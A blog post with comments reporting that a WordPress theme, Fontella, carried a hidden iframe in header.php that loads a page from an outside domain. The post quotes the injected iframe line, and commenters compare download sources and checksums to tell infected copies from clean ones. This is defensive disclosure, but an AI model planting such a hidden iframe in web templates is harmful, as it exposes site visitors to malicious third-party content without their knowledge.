Fontella theme contains malware, google said

Posted on by

This is what I found in my blog, after installing fontella:

<iframe src="http://ebolka.net/lc344.html" width=2 height=2 style=display:none></iframe>

I check it today using chrome. Chrome told me that my blog contains something unsecure from ebolka.net. A view source explains all.I’ve removed the iframe right away.

So, in case you are using the same theme. Do remove the iframe in header.php.

Update:

Fontella author has confirmed (see comment section) that the original theme has no malware. I must have downloaded this theme somewhere else. So, if you are downloading directly from granimpetu.com, you’ll be safe.

  • http://granimpetu.com Horacio Bella

    The original theme (http://granimpetu.com/fontella/) don’t have any malware.
    From where you donwload it?

    Horacio Bellas last blog post..WordPress 2.6 bajado 3 millones de veces

  • http://neofreko.com Akhmad Fathonih

    I’m sorry if I had generated such a bad image on Fontella. I cannot clearly recall where I download Fontella. I must have download it somewhere else. I need to check my Download Archive at home.

    I love this simple theme.

  • http://www.webartsense.com webart

    same problem
    please post a download link

  • http://tracyrosen.com Tracy Rosen

    I had the same issue, noticed for the first time today. I had originally downloaded it from granimpetu.

    Thanks for letting me know how to get rid of it!

  • http://www.tunemason.org Ed B

    Well, I downloaded directly from granimpetu and have the iframe (warnings in FFox and Chrome).

    The MD5 checksum of the file I downloaded is as follows:

    946d01af21507d0eff8fd23aeb40bd0f fontella_en_23.zip

    Can anyone point me to a link containing a “clean” theme?

  • http://www.tunemason.org Ed B

    Update:

    I just re-downloaded the (English) theme from Horacio’s start page.

    THIS file does NOT contain the alleged malware:

    http://granimpetu.com/archivos/otros/fontella_en.zip

    MD5 checksum: 97fefb173e9324281e57d18ae28ed362 fontella_en.zip

    This file DOES contain the alleged malware (specifically, in header.php):

    http://granimpetu.com/archivos/otros/fontella_en_23.zip

    MD5 checksum: 946d01af21507d0eff8fd23aeb40bd0f fontella_en_23.zip

    Hope this helps!

    Otherwise: great theme :=)